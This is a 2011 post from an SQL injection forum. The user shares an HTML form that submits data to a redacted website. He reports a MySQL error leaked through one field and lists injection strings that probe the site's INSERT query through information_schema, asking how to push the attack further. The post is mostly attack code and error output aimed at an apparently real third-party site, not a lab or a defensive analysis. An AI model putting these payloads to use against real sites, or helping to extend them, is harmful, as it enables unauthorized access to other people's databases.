|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 55
Members: 0
Total: 55
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Advanced SQL injection [ Help ] |
|
Posted: Mon Jul 04, 2011 3:14 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
I made this page as it the same ...
Code: | <html>
<form name="AddNewdForm" id="AddNewdForm" action= "http://www.xxx.com/once.php" method="post" enctype="multipart/form-data">
<input type="text" name="etat_civile" value="Mr">
<input type="text" name="Nom_d" id="Nom_d" value="ad">
<input type="text" name="Prenom_d" id="Prenom_d" value="b">
<input type="text" name="Adresse_d" id="Adresse_d" value="c">
<input type="text" name="Commune_d" id="Commune_d" value="xxxxxxxx">
<input type="text" name="Wilaya" id="Wilaya" value="44">
<input type="text" name="Sujet" id="Sujet" value="8">
<input type="text" name="Client_d" value="Oui">
<input type="text" name="Telephone_d" id="Telephone_d" value="04546547">
<input type="text" name="Email_d" id="Email_d" value="dump@hotmail.fr">
<input type="text" name="hiddene_d" id="hiddene_d" cols="55" value="aa">
<input type="submit" name="Submit2" "value="Test!">
<input type="text" name="dAction" id="dAction" value="Add">
</form>
</html> |
So I found a SQL bug through data input ( parameter name ) via POST request .. Once i try xxxxxxxx" in the parameter name Commune_d i got the this error message :
Code: |
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '44","8","Oui","046546467","dump@hotmail.fr","","1309734000","16:14:16","41.201.8' at line 1 |
So ? Its the INSERT INTO command ? right ?
look again here ... When i try this
Code: | 0x3e,0x3e) SELECT * from information_schema.tables--
0x3e,0x3e,0x3e) SELECT * from information_schema.tables--
0x3e,0x3e,0x3e,0x3e) SELECT * from information_schema.tables--
|
It get a normal page .. But here its deffirent
Code: | 0x3e,0x3e,0x3e,0x3e,0x3e) SELECT * from information_schema.tables-- |
1406:Data too long for column 'Email_D' at row 1
So ? |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|